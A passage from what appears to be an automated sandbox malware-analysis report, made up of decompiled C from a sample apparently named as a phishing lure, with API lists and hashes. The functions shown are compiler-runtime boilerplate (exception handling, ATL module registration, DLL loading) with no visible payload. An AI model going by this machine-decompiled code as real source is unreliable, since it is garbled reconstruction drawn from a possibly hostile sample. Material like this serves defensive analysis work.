    				signed int _t269;
    				signed char* _t270;
    				intOrPtr* _t271;
    				signed char _t272;
    				signed int _t273;
    				signed int _t274;
    				intOrPtr* _t276;
    				signed int _t277;
    				signed int _t278;
    				signed int _t283;
    				signed int _t290;
    				signed int _t291;
    				signed int _t294;
    				signed int _t296;
    				signed char* _t297;
    				signed int _t298;
    				signed char _t299;
    				signed int* _t301;
    				signed char* _t304;
    				signed int _t314;
    				signed int _t315;
    				signed int _t317;
    				signed int _t327;
    				void* _t329;
    				void* _t331;
    				void* _t332;
    				void* _t333;
    				void* _t334;
    
    				_t296 = __edx;
    				_push(_t315);
    				_t301 = _a20;
    				_v20 = 0;
    				_v28 = 0;
    				_t275 = E00EA707A(_a8, _a16, _t301);
    				_t332 = _t331 + 0xc;
    				_v12 = _t275;
    				if(_t275 < 0xffffffff || _t275 >= _t301[1]) {
    					L67:
    					_t201 = E00EA8A26(_t270, _t275, _t296, _t301, _t315);
    					asm("int3");
    					_t329 = _t332;
    					_t333 = _t332 - 0x38;
    					_push(_t270);
    					_t271 = _v112;
    					__eflags =  *_t271 - 0x80000003;
    					if( *_t271 == 0x80000003) {
    						return _t201;
    					} else {
    						_push(_t315);
    						_push(_t301);
    						_t202 = E00EA5DCC(_t271, _t275, _t296, _t301, _t315);
    						__eflags =  *(_t202 + 8);
    						if( *(_t202 + 8) != 0) {
    							__imp__EncodePointer(0);
    							_t315 = _t202;
    							_t222 = E00EA5DCC(_t271, _t275, _t296, 0, _t315);
    							__eflags =  *((intOrPtr*)(_t222 + 8)) - _t315;
    							if( *((intOrPtr*)(_t222 + 8)) != _t315) {
    								__eflags =  *_t271 - 0xe0434f4d;
    								if( *_t271 != 0xe0434f4d) {
    									__eflags =  *_t271 - 0xe0434352;
    									if( *_t271 != 0xe0434352) {
    										_t214 = E00EA4F23(_t296, 0, _t315, _t271, _a4, _a8, _a12, _a16, _a24, _a28);
    										_t333 = _t333 + 0x1c;
    										__eflags = _t214;
    										if(_t214 != 0) {
    											L84:
    											return _t214;
    										}
    									}
    								}
    							}
    						}
    						_t203 = _a16;
    						_v28 = _t203;
    						_v24 = 0;
    						__eflags =  *(_t203 + 0xc);
    						if( *(_t203 + 0xc) > 0) {
    							_push(_a24);
    							E00EA4E56(_t271, _t275, 0, _t315,  &_v44,  &_v28, _a20, _a12, _t203);
    							_t298 = _v40;
    							_t334 = _t333 + 0x18;
    							_t214 = _v44;
    							_v20 = _t214;
    							_v12 = _t298;
    							__eflags = _t298 - _v32;
    							if(_t298 >= _v32) {
    								goto L84;
    							}
    							_t277 = _t298 * 0x14;
    							__eflags = _t277;
    							_v16 = _t277;
    							do {
    								_t278 = 5;
    								_t217 = memcpy( &_v64,  *((intOrPtr*)( *_t214 + 0x10)) + _t277, _t278 << 2);
    								_t334 = _t334 + 0xc;
    								__eflags = _v64 - _t217;
    								if(_v64 > _t217) {
    									goto L83;
    								}
    								__eflags = _t217 - _v60;
    								if(_t217 > _v60) {
    									goto L83;
    								}
    								_t220 = _v48 + 0xfffffff0 + (_v52 << 4);
    								_t283 = _t220[4];
    								__eflags = _t283;
    								if(_t283 == 0) {
    									L81:
    									__eflags =  *_t220 & 0x00000040;
    									if(( *_t220 & 0x00000040) == 0) {
    										_push(0);
    										_push(1);
    										E00EA6091(_t298, _t271, _a4, _a8, _a12, _a16, _t220, 0,  &_v64, _a24, _a28);
    										_t298 = _v12;
    										_t334 = _t334 + 0x30;
    									}
    									goto L83;
    								}
    								__eflags =  *((char*)(_t283 + 8));
    								if( *((char*)(_t283 + 8)) != 0) {
    									goto L83;
    								}
    								goto L81;
    								L83:
    								_t298 = _t298 + 1;
    								_t214 = _v20;
    								_t277 = _v16 + 0x14;
    								_v12 = _t298;
    								_v16 = _t277;
    								__eflags = _t298 - _v32;
    							} while (_t298 < _v32);
    							goto L84;
    						}
    						E00EA8A26(_t271, _t275, _t296, 0, _t315);
    						asm("int3");
    						_push(_t329);
    						_t297 = _v184;
    						_push(_t271);
    						_push(_t315);
    						_push(0);
    						_t205 = _t297[4];
    						__eflags = _t205;
    						if(_t205 == 0) {
    							L109:
    							_t207 = 1;
    							__eflags = 1;
    						} else {
    							_t276 = _t205 + 8;
    							__eflags =  *_t276;
    							if( *_t276 == 0) {
    								goto L109;
    							} else {
    								__eflags =  *_t297 & 0x00000080;
    								_t304 = _v0;
    								if(( *_t297 & 0x00000080) == 0) {
    									L91:
    									_t272 = _t304[4];
    									_t317 = 0;
    									__eflags = _t205 - _t272;
    									if(_t205 == _t272) {
    										L101:
    										__eflags =  *_t304 & 0x00000002;
    										if(( *_t304 & 0x00000002) == 0) {
    											L103:
    											_t208 = _a4;
    											__eflags =  *_t208 & 0x00000001;
    											if(( *_t208 & 0x00000001) == 0) {
    												L105:
    												__eflags =  *_t208 & 0x00000002;
    												if(( *_t208 & 0x00000002) == 0) {
    													L107:
    													_t317 = 1;
    													__eflags = 1;
    												} else {
    													__eflags =  *_t297 & 0x00000002;
    													if(( *_t297 & 0x00000002) != 0) {
    														goto L107;
    													}
    												}
    											} else {
    												__eflags =  *_t297 & 0x00000001;
    												if(( *_t297 & 0x00000001) != 0) {
    													goto L105;
    												}
    											}
    										} else {
    											__eflags =  *_t297 & 0x00000008;
    											if(( *_t297 & 0x00000008) != 0) {
    												goto L103;
    											}
    										}
    										_t207 = _t317;
    									} else {
    										_t184 = _t272 + 8; // 0x6e
    										_t209 = _t184;
    										while(1) {
    											_t273 =  *_t276;
    											__eflags = _t273 -  *_t209;
    											if(_t273 !=  *_t209) {
    												break;
    											}
    											__eflags = _t273;
    											if(_t273 == 0) {
    												L97:
    												_t210 = _t317;
    											} else {
    												_t274 =  *((intOrPtr*)(_t276 + 1));
    												__eflags = _t274 -  *((intOrPtr*)(_t209 + 1));
    												if(_t274 !=  *((intOrPtr*)(_t209 + 1))) {
    													break;
    												} else {
    													_t276 = _t276 + 2;
    													_t209 = _t209 + 2;
    													__eflags = _t274;
    													if(_t274 != 0) {
    														continue;
    													} else {
    														goto L97;
    													}
    												}
    											}
    											L99:
    											__eflags = _t210;
    											if(_t210 == 0) {
    												goto L101;
    											} else {
    												_t207 = 0;
    											}
    											goto L110;
    										}
    										asm("sbb eax, eax");
    										_t210 = _t209 | 0x00000001;
    										__eflags = _t210;
    										goto L99;
    									}
    								} else {
    									__eflags =  *_t304 & 0x00000010;
    									if(( *_t304 & 0x00000010) != 0) {
    										goto L109;
    									} else {
    										goto L91;
    									}
    								}
    							}
    						}
    						L110:
    						return _t207;
    					}
    				} else {
    					_t270 = _a4;
    					if( *_t270 != 0xe06d7363 || _t270[0x10] != 3 || _t270[0x14] != 0x19930520 && _t270[0x14] != 0x19930521 && _t270[0x14] != 0x19930522) {
    						L22:
    						_t296 = _a12;
    						_v8 = _t296;
    						goto L24;
    					} else {
    						_t315 = 0;
    						if(_t270[0x1c] != 0) {
    							goto L22;
    						} else {
    							_t224 = E00EA5DCC(_t270, _t275, _t296, _t301, 0);
    							if( *((intOrPtr*)(_t224 + 0x10)) == 0) {
    								L61:
    								return _t224;
    							} else {
    								_t270 =  *(E00EA5DCC(_t270, _t275, _t296, _t301, 0) + 0x10);
    								_t259 = E00EA5DCC(_t270, _t275, _t296, _t301, 0);
    								_v28 = 1;
    								_v8 =  *((intOrPtr*)(_t259 + 0x14));
    								if(_t270 == 0 ||  *_t270 == 0xe06d7363 && _t270[0x10] == 3 && (_t270[0x14] == 0x19930520 || _t270[0x14] == 0x19930521 || _t270[0x14] == 0x19930522) && _t270[0x1c] == _t315) {
    									goto L67;
    								} else {
    									if( *((intOrPtr*)(E00EA5DCC(_t270, _t275, _t296, _t301, _t315) + 0x1c)) == _t315) {
    										L23:
    										_t296 = _v8;
    										_t275 = _v12;
    										L24:
    										_v52 = _t301;
    										_v48 = 0;
    										__eflags =  *_t270 - 0xe06d7363;
    										if( *_t270 != 0xe06d7363) {
    											L57:
    											__eflags = _t301[3];
    											if(_t301[3] <= 0) {
    												goto L60;
    											} else {
    												__eflags = _a24;
    												if(_a24 != 0) {
    													goto L67;
    												} else {
    													_push(_a32);
    													_push(_a28);
    													_push(_t275);
    													_push(_t301);
    													_push(_a16);
    													_push(_t296);
    													_push(_a8);
    													_push(_t270);
    													L68();
    													_t332 = _t332 + 0x20;
    													goto L60;
    												}
    											}
    										} else {
    											__eflags = _t270[0x10] - 3;
    											if(_t270[0x10] != 3) {
    												goto L57;
    											} else {
    												__eflags = _t270[0x14] - 0x19930520;
    												if(_t270[0x14] == 0x19930520) {
    													L29:
    													_t315 = _a32;
    													__eflags = _t301[3];
    													if(_t301[3] > 0) {
    														_push(_a28);
    														E00EA4E56(_t270, _t275, _t301, _t315,  &_v68,  &_v52, _t275, _a16, _t301);
    														_t296 = _v64;
    														_t332 = _t332 + 0x18;
    														_t247 = _v68;
    														_v44 = _t247;
    														_v16 = _t296;
    														__eflags = _t296 - _v56;
    														if(_t296 < _v56) {
    															_t290 = _t296 * 0x14;
    															__eflags = _t290;
    															_v32 = _t290;
    															do {
    																_t291 = 5;
    																_t250 = memcpy( &_v104,  *((intOrPtr*)( *_t247 + 0x10)) + _t290, _t291 << 2);
    																_t332 = _t332 + 0xc;
    																__eflags = _v104 - _t250;
    																if(_v104 <= _t250) {
    																	__eflags = _t250 - _v100;
    																	if(_t250 <= _v100) {
    																		_t294 = 0;
    																		_v20 = 0;
    																		__eflags = _v92;
    																		if(_v92 != 0) {
    																			_t299 = _t270[0x1c];
    																			_t251 =  *((intOrPtr*)(_t299 + 0xc));
    																			_t252 = _t251 + 4;
    																			__eflags = _t252;
    																			_v36 = _t252;
    																			_t253 = _v88;
    																			_v40 =  *_t251;
    																			_v24 = _t253;
    																			do {
    																				asm("movsd");
    																				asm("movsd");
    																				asm("movsd");
    																				asm("movsd");
    																				_t327 = _v40;
    																				_t314 = _v36;
    																				__eflags = _t327;
    																				if(_t327 <= 0) {
    																					goto L40;
    																				} else {
    																					while(1) {
    																						_push(_t299);
    																						_push( *_t314);
    																						_t254 =  &_v84;
    																						_push(_t254);
    																						L87();
    																						_t332 = _t332 + 0xc;
    																						__eflags = _t254;
    																						if(_t254 != 0) {
    																							break;
    																						}
    																						_t299 = _t270[0x1c];
    																						_t327 = _t327 - 1;
    																						_t314 = _t314 + 4;
    																						__eflags = _t327;
    																						if(_t327 > 0) {
    																							continue;
    																						} else {
    																							_t294 = _v20;
    																							_t253 = _v24;
    																							goto L40;
    																						}
    																						goto L43;
    																					}
    																					_push(_a24);
    																					_push(_v28);
    																					E00EA6091(_t299, _t270, _a8, _v8, _a16, _a20,  &_v84,  *_t314,  &_v104, _a28, _a32);
    																					_t332 = _t332 + 0x30;
    																				}
    																				L43:
    																				_t296 = _v16;
    																				goto L44;
    																				L40:
    																				_t294 = _t294 + 1;
    																				_t253 = _t253 + 0x10;
    																				_v20 = _t294;
    																				_v24 = _t253;
    																				__eflags = _t294 - _v92;
    																			} while (_t294 != _v92);
    																			goto L43;
    																		}
    																	}
    																}
    																L44:
    																_t296 = _t296 + 1;
    																_t247 = _v44;
    																_t290 = _v32 + 0x14;
    																_v16 = _t296;
    																_v32 = _t290;
    																__eflags = _t296 - _v56;
    															} while (_t296 < _v56);
    															_t301 = _a20;
    															_t315 = _a32;
    														}
    													}
    													__eflags = _a24;
    													if(__eflags != 0) {
    														_push(1);
    														E00EA536A(_t270, _t301, _t315, __eflags);
    														_t275 = _t270;
    													}
    													__eflags = ( *_t301 & 0x1fffffff) - 0x19930521;
    													if(( *_t301 & 0x1fffffff) < 0x19930521) {
    														L60:
    														_t224 = E00EA5DCC(_t270, _t275, _t296, _t301, _t315);
    														__eflags =  *(_t224 + 0x1c);
    														if( *(_t224 + 0x1c) != 0) {
    															goto L67;
    														} else {
    															goto L61;
    														}
    													} else {
    														_t228 = _t301[8] >> 2;
    														__eflags = _t301[7];
    														if(_t301[7] != 0) {
    															__eflags = _t228 & 0x00000001;
    															if((_t228 & 0x00000001) == 0) {
    																_push(_t301[7]);
    																_t229 = E00EA6B26(_t270, _t301, _t315, _t270);
    																_pop(_t275);
    																__eflags = _t229;
    																if(_t229 == 0) {
    																	goto L64;
    																} else {
    																	goto L60;
    																}
    															} else {
    																goto L54;
    															}
    														} else {
    															__eflags = _t228 & 0x00000001;
    															if((_t228 & 0x00000001) == 0) {
    																goto L60;
    															} else {
    																__eflags = _a28;
    																if(_a28 != 0) {
    																	goto L60;
    																} else {
    																	L54:
    																	 *(E00EA5DCC(_t270, _t275, _t296, _t301, _t315) + 0x10) = _t270;
    																	_t237 = E00EA5DCC(_t270, _t275, _t296, _t301, _t315);
    																	_t286 = _v8;
    																	 *((intOrPtr*)(_t237 + 0x14)) = _v8;
    																	goto L62;
    																}
    															}
    														}
    													}
    												} else {
    													__eflags = _t270[0x14] - 0x19930521;
    													if(_t270[0x14] == 0x19930521) {
    														goto L29;
    													} else {
    														__eflags = _t270[0x14] - 0x19930522;
    														if(_t270[0x14] != 0x19930522) {
    															goto L57;
    														} else {
    															goto L29;
    														}
    													}
    												}
    											}
    										}
    									} else {
    										_v16 =  *((intOrPtr*)(E00EA5DCC(_t270, _t275, _t296, _t301, _t315) + 0x1c));
    										_t264 = E00EA5DCC(_t270, _t275, _t296, _t301, _t315);
    										_push(_v16);
    										 *(_t264 + 0x1c) = _t315;
    										_t265 = E00EA6B26(_t270, _t301, _t315, _t270);
    										_pop(_t286);
    										if(_t265 != 0) {
    											goto L23;
    										} else {
    											_t301 = _v16;
    											_t353 =  *_t301 - _t315;
    											if( *_t301 <= _t315) {
    												L62:
    												E00EA783D(_t270, _t286, _t296, _t301, _t315, __eflags);
    											} else {
    												while(1) {
    													_t286 =  *((intOrPtr*)(_t315 + _t301[1] + 4));
    													if(E00EA67AF( *((intOrPtr*)(_t315 + _t301[1] + 4)), _t353, 0xfe2230) != 0) {
    														goto L63;
    													}
    													_t315 = _t315 + 0x10;
    													_t269 = _v20 + 1;
    													_v20 = _t269;
    													_t353 = _t269 -  *_t301;
    													if(_t269 >=  *_t301) {
    														goto L62;
    													} else {
    														continue;
    													}
    													goto L63;
    												}
    											}
    											L63:
    											_push(1);
    											_push(_t270);
    											E00EA536A(_t270, _t301, _t315, __eflags);
    											_t275 =  &_v64;
    											E00EA6797( &_v64);
    											E00EA5D44( &_v64, 0xeb70d4);
    											L64:
    											 *(E00EA5DCC(_t270, _t275, _t296, _t301, _t315) + 0x10) = _t270;
    											_t231 = E00EA5DCC(_t270, _t275, _t296, _t301, _t315);
    											_t275 = _v8;
    											 *(_t231 + 0x14) = _v8;
    											__eflags = _t315;
    											if(_t315 == 0) {
    												_t315 = _a8;
    											}
    											E00EA5049(_t275, _t315, _t270);
    											E00EA6A26(_a8, _a16, _t301);
    											_t234 = E00EA6BE3(_t301);
    											_t332 = _t332 + 0x10;
    											_push(_t234);
    											E00EA699D(_t270, _t275, _t296, _t301, _t315, __eflags);
    											goto L67;
    										}
    									}
    								}
    							}
    						}
    					}
    				}
    			}

    APIs
    • type_info::operator==.LIBVCRUNTIME ref: 00EA6230
    • ___TypeMatch.LIBVCRUNTIME ref: 00EA633E
    • _UnwindNestedFrames.LIBCMT ref: 00EA6490
    • CallUnexpected.LIBVCRUNTIME ref: 00EA64AB
    Strings
    Memory Dump Source
    • Source File: 00000001.00000002.778471988.0000000000EA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EA0000, based on PE: true
    • Associated: 00000001.00000002.778444294.0000000000EA0000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000001.00000002.778735204.0000000000EB1000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000001.00000002.778766212.0000000000EB9000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000001.00000002.778775493.0000000000EBA000.00000008.00000001.01000000.00000003.sdmp
    • Associated: 00000001.00000002.779868874.0000000000FE2000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000001.00000002.780096940.0000000000FE3000.00000002.00000001.01000000.00000003.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_1_2_ea0000_Confirming#000092002.jbxd
    Similarity
    • API ID: CallFramesMatchNestedTypeUnexpectedUnwindtype_info::operator==
    • String ID: csm$csm$csm
    • API String ID: 2751267872-393685449
    • Opcode ID: 4faf25c7960ee819cfbdbda4ab9608a0f18128e5952f3fd84ade6d599199c7ed
    • Instruction ID: 40feceeeb852b4241ddd5e309c60cec972a6c4b56b5d9150645f6359e3d3e5bd
    • Opcode Fuzzy Hash: 4faf25c7960ee819cfbdbda4ab9608a0f18128e5952f3fd84ade6d599199c7ed
    • Instruction Fuzzy Hash: 9BB16B728002099FCF14DFA4C8819AEBBB5BF5F318B18605AE8257F212D734FA51CB91
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 81%
    			E00EA3790(void* __ebx, signed int __ecx, signed int __edx, void* __edi, void* __eflags, signed int _a4, intOrPtr* _a8) {
    				signed int _v8;
    				char _v268;
    				char _v1314;
    				struct HINSTANCE__* _v1316;
    				char _v2356;
    				unsigned int _v2360;
    				signed int _v2364;
    				signed int _v2368;
    				char _v2372;
    				char _v2396;
    				char _v2412;
    				signed int _v2424;
    				void* __esi;
    				void* __ebp;
    				signed int _t50;
    				signed int _t53;
    				signed int _t55;
    				long _t60;
    				signed int _t63;
    				signed int _t64;
    				void* _t65;
    				signed int _t69;
    				signed int _t72;
    				signed int _t74;
    				void* _t75;
    				char* _t80;
    				signed int _t86;
    				signed int _t94;
    				intOrPtr _t97;
    				void* _t101;
    				struct HINSTANCE__* _t102;
    				signed int _t103;
    				signed int _t104;
    				intOrPtr* _t119;
    				signed int _t132;
    				void* _t133;
    				intOrPtr* _t137;
    				signed int _t138;
    				void* _t139;
    				signed int _t140;
    				intOrPtr* _t141;
    				signed int _t143;
    				void* _t145;
    				void* _t147;
    
    				_t130 = __edx;
    				_t100 = __ebx;
    				_t50 =  *0xeb9008; // 0x64e1d101
    				_v8 = _t50 ^ _t143;
    				_push(__ebx);
    				_t137 = _a8;
    				_push(__edi);
    				_t132 = __ecx;
    				_v2368 = __edx;
    				_t53 = E00EA10C5(E00EA3762( &_v2412),  &_v2396);
    				if(_t53 < 0) {
    					L8:
    					_t138 = _t53;
    					goto L9;
    				} else {
    					_v2372 = 1;
    					if(_t137 != 0) {
    						while(1) {
    							_t97 =  *_t137;
    							if(_t97 == 0) {
    								goto L5;
    							}
    							_push( *((intOrPtr*)(_t137 + 4)));
    							_push(_t97);
    							_push( &_v2412);
    							E00EA1A54(_t100, _t132, _t137, __eflags);
    							_t137 = _t137 + 8;
    						}
    					}
    					L5:
    					_t138 =  *((intOrPtr*)( *_t132 + 0x14))( &_v2412);
    					if(_t138 < 0) {
    						L9:
    						E00EA19FE( &_v2412, _t132);
    						_t55 = _t138;
    						goto L10;
    					} else {
    						_t102 =  *0xfe2394; // 0xea0000
    						_t132 = 0x104;
    						_t140 = 0;
    						_v2364 = 0;
    						_t60 = GetModuleFileNameA(_t102,  &_v268, 0x104);
    						if(_t60 != 0) {
    							__eflags = _t60 - 0x104;
    							if(_t60 != 0x104) {
    								_t63 = E00EA74D0( &_v268) + 1;
    								_t130 = _t63;
    								_v2360 = _t63;
    								_t64 = E00EA1181( &_v2360, _t63);
    								_t147 = _t145 + 4;
    								__eflags = _t64;
    								if(_t64 < 0) {
    									L21:
    									_t138 = 0x8007000e;
    									goto L9;
    								} else {
    									_t134 = _v2360;
    									__eflags = _v2360 - 0x400;
    									if(__eflags > 0) {
    										L17:
    										_t65 = E00EA3CD7( &_v2364, _t140, _t134);
    										_t140 = _v2364;
    									} else {
    										_t94 = E00EA11AE(_t102, _t134, _t134, 0, __eflags);
    										__eflags = _t94;
    										if(_t94 == 0) {
    											goto L17;
    										} else {
    											E00EB02F0(_t134);
    											_t65 = _t147;
    										}
    									}
    									_t130 =  &_v268;
    									_t132 = E00EA121E(_t65,  &_v268, _t134 >> 1, 3);
    									__eflags = _t132;
    									if(_t132 != 0) {
    										E00EA14EE( &_v2356, _t132);
    										_pop(0);
    										__eflags = _t102;
    										if(_t102 == 0) {
    											L25:
    											_t102 = 0x22;
    											_v1316 = _t102;
    											_t69 = E00EA75E7( &_v2356);
    											_t130 = 0x416;
    											_t72 = E00EA1105( &_v1314, 0x416,  &_v2356, 2 + _t69 * 2);
    											__eflags = _t72;
    											if(_t72 == 0) {
    												_t74 = E00EA75E7( &_v1316);
    												_pop(_t119);
    												 *(_t143 + _t74 * 2 - 0x520) = _t102;
    												_t75 = 2 + _t74 * 2;
    												__eflags = _t75 - 0x418;
    												if(_t75 >= 0x418) {
    													E00EA43FC();
    													asm("int3");
    													_push(_t143);
    													_push(_t140);
    													_t141 = _t119;
    													 *_t141 = 0xeb613c;
    													E00EA140D(_t102, _t119, _t132, _t141);
    													__eflags = _v2424 & 0x00000001;
    													if((_v2424 & 0x00000001) != 0) {
    														_push(0x3c);
    														E00EA42A0(_t141);
    													}
    													return _t141;
    												} else {
    													__eflags = 0;
    													 *((short*)(_t143 + _t75 - 0x520)) = 0;
    													_t80 =  &_v1316;
    													goto L31;
    												}
    											} else {
    												__eflags = _t140;
    												if(_t140 != 0) {
    													do {
    														_t132 =  *_t140;
    														_t140 = _t132;
    														E00EA7188(_t140);
    														__eflags = _t132;
    													} while (_t132 != 0);
    												}
    												_t138 = 0x80004005;
    												goto L9;
    											}
    										} else {
    											__eflags = _t102 - GetModuleHandleA(0);
    											if(__eflags == 0) {
    												goto L25;
    											} else {
    												_t80 =  &_v2356;
    												L31:
    												_push(_t80);
    												_push(L"Module");
    												_push( &_v2412);
    												_t103 = E00EA1A54(_t102, _t132, _t140, __eflags);
    												__eflags = _t103;
    												if(__eflags >= 0) {
    													_push( &_v2356);
    													_push(L"Module_Raw");
    													_push( &_v2412);
    													_t103 = E00EA1A54(_t103, _t132, _t140, __eflags);
    													__eflags = _t103;
    													if(_t103 >= 0) {
    														__eflags = _a4;
    														_t130 = _t132;
    														_push(0);
    														_push(_v2368);
    														if(__eflags == 0) {
    															_t86 = E00EA1F97(_t103,  &_v2412, _t130, _t132, _t140, __eflags);
    														} else {
    															_t86 = E00EA1DBF(_t103,  &_v2412, _t130, _t132, _t140, __eflags);
    														}
    														_t104 = _t86;
    														__eflags = _t140;
    														if(_t140 != 0) {
    															do {
    																_t132 =  *_t140;
    																_t140 = _t132;
    																E00EA7188(_t140);
    																__eflags = _t132;
    															} while (_t132 != 0);
    														}
    														E00EA19FE( &_v2412, _t132);
    														_t55 = _t104;
    													} else {
    														__eflags = _t140;
    														if(_t140 != 0) {
    															do {
    																_t132 =  *_t140;
    																_t140 = _t132;
    																E00EA7188(_t140);
    																__eflags = _t132;
    															} while (_t132 != 0);
    														}
    														goto L34;
    													}
    												} else {
    													__eflags = _t140;
    													if(_t140 != 0) {
    														do {
    															_t132 =  *_t140;
    															_t140 = _t132;
    															E00EA7188(_t140);
    															__eflags = _t132;
    														} while (_t132 != 0);
    													}
    													L34:
    													_t138 = _t103;
    													goto L9;
    												}
    												L10:
    												_pop(_t133);
    												_pop(_t139);
    												_pop(_t101);
    												return E00EA403C(_t55, _t101, _v8 ^ _t143, _t130, _t133, _t139);
    											}
    										}
    									} else {
    										__eflags = _t140;
    										if(_t140 != 0) {
    											do {
    												_t132 =  *_t140;
    												_t140 = _t132;
    												E00EA7188(_t140);
    												__eflags = _t132;
    											} while (_t132 != 0);
    										}
    										goto L21;
    									}
    								}
    							} else {
    								_t138 = 0x8007007a;
    								goto L9;
    							}
    						} else {
    							_t53 = E00EA12C0();
    							goto L8;
    						}
    					}
    				}
    			}

    APIs
      • Part of subcall function 00EA10C5: InitializeCriticalSectionEx.KERNEL32(?,00000000,00000000,?,?,00EB7488), ref: 00EA10CB
      • Part of subcall function 00EA10C5: GetLastError.KERNEL32(?,00000000,00000000,?,?,00EB7488), ref: 00EA10D5
    • GetModuleFileNameA.KERNEL32(00EA0000,?,00000104), ref: 00EA3821
    • _strlen.LIBCMT ref: 00EA3868
    • __alloca_probe_16.LIBCMT ref: 00EA38A3
    • GetModuleHandleA.KERNEL32(00000000,?), ref: 00EA3906
    Strings
    Memory Dump Source
    • Source File: 00000001.00000002.778471988.0000000000EA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EA0000, based on PE: true
    • Associated: 00000001.00000002.778444294.0000000000EA0000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000001.00000002.778735204.0000000000EB1000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000001.00000002.778766212.0000000000EB9000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000001.00000002.778775493.0000000000EBA000.00000008.00000001.01000000.00000003.sdmp
    • Associated: 00000001.00000002.779868874.0000000000FE2000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000001.00000002.780096940.0000000000FE3000.00000002.00000001.01000000.00000003.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_1_2_ea0000_Confirming#000092002.jbxd
    Similarity
    • API ID: Module$CriticalErrorFileHandleInitializeLastNameSection__alloca_probe_16_strlen
    • String ID: Module$Module_Raw
    • API String ID: 1906531792-3885325121
    • Opcode ID: a7356d8f5c8bc592a090de83452ee7d3708592ac6149c2ecb785a4aaec91f556
    • Instruction ID: 0c8c66746b9aadcb7c182ccc10d3566f2b8870692ed8357ad3edf1edd2c59d16
    • Opcode Fuzzy Hash: a7356d8f5c8bc592a090de83452ee7d3708592ac6149c2ecb785a4aaec91f556
    • Instruction Fuzzy Hash: 2281F732A0112857DB259B64DC41AEB73E89F9E314F112196F949BF242DB74FF85CB40
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 100%
    			E00EA96F7(void* __ecx, signed int* _a4, intOrPtr _a8) {
    				signed int* _v8;
    				void** _t12;
    				void* _t16;
    				void* _t18;
    				signed int _t22;
    				WCHAR* _t23;
    				void** _t26;
    				signed int* _t29;
    				void* _t32;
    				void* _t34;
    
    				_t29 = _a4;
    				while(_t29 != _a8) {
    					_t22 =  *_t29;
    					_t12 = 0xfe2b68 + _t22 * 4;
    					_t32 =  *_t12;
    					_v8 = _t12;
    					if(_t32 == 0) {
    						_t23 =  *(0xeb2648 + _t22 * 4);
    						_t32 = LoadLibraryExW(_t23, 0, 0x800);
    						if(_t32 != 0) {
    							L12:
    							_t26 = _v8;
    							 *_t26 = _t32;
    							if( *_t26 != 0) {
    								FreeLibrary(_t32);
    							}
    							L14:
    							if(_t32 != 0) {
    								_t16 = _t32;
    								L18:
    								return _t16;
    							}
    							L15:
    							_t29 =  &(_t29[1]);
    							continue;
    						}
    						_t18 = GetLastError();
    						if(_t18 != 0x57) {
    							L9:
    							_t32 = 0;
    							L10:
    							if(_t32 != 0) {
    								goto L12;
    							}
    							 *_v8 = _t18 | 0xffffffff;
    							goto L15;
    						}
    						_t18 = E00EA8B48(_t23, L"api-ms-", 7);
    						_t34 = _t34 + 0xc;
    						if(_t18 == 0) {
    							goto L9;
    						}
    						_t18 = E00EA8B48(_t23, L"ext-ms-", 7);
    						_t34 = _t34 + 0xc;
    						if(_t18 == 0) {
    							goto L9;
    						}
    						_t18 = LoadLibraryExW(_t23, _t32, _t32);
    						_t32 = _t18;
    						goto L10;
    					}
    					if(_t32 == 0xffffffff) {
    						goto L15;
    					}
    					goto L14;
    				}
    				_t16 = 0;
    				goto L18;
    			}

    Strings
    Memory Dump Source
    • Source File: 00000001.00000002.778471988.0000000000EA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EA0000, based on PE: true
    • Associated: 00000001.00000002.778444294.0000000000EA0000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000001.00000002.778735204.0000000000EB1000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000001.00000002.778766212.0000000000EB9000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000001.00000002.778775493.0000000000EBA000.00000008.00000001.01000000.00000003.sdmp
    • Associated: 00000001.00000002.779868874.0000000000FE2000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000001.00000002.780096940.0000000000FE3000.00000002.00000001.01000000.00000003.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_1_2_ea0000_Confirming#000092002.jbxd
    Similarity
    • API ID:
    • String ID: api-ms-$ext-ms-
    • API String ID: 0-537541572
    • Opcode ID: f78c7b616e787023244ac4a1a02176383cbe4abe298b7066c77dfa2e18ef4f56
    • Instruction ID: 2f9d91334e0020109fee72f66fb7b135f050f65ad1439bfc36954b91cef044b8
    • Opcode Fuzzy Hash: f78c7b616e787023244ac4a1a02176383cbe4abe298b7066c77dfa2e18ef4f56
    • Instruction Fuzzy Hash: 7B21D575E21221ABCB214F659C85A9B37989F4B764F212652FD16BF292DA30FD0086F0
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 100%
    			E00EABD49(intOrPtr _a4) {
    				void* _t18;
    
    				_t45 = _a4;
    				if(_a4 != 0) {
    					E00EABD11(_t45, 7);
    					E00EABD11(_t45 + 0x1c, 7);
    					E00EABD11(_t45 + 0x38, 0xc);
    					E00EABD11(_t45 + 0x68, 0xc);
    					E00EABD11(_t45 + 0x98, 2);
    					E00EA8B82( *((intOrPtr*)(_t45 + 0xa0)));
    					E00EA8B82( *((intOrPtr*)(_t45 + 0xa4)));
    					E00EA8B82( *((intOrPtr*)(_t45 + 0xa8)));
    					E00EABD11(_t45 + 0xb4, 7);
    					E00EABD11(_t45 + 0xd0, 7);
    					E00EABD11(_t45 + 0xec, 0xc);
    					E00EABD11(_t45 + 0x11c, 0xc);
    					E00EABD11(_t45 + 0x14c, 2);
    					E00EA8B82( *((intOrPtr*)(_t45 + 0x154)));
    					E00EA8B82( *((intOrPtr*)(_t45 + 0x158)));
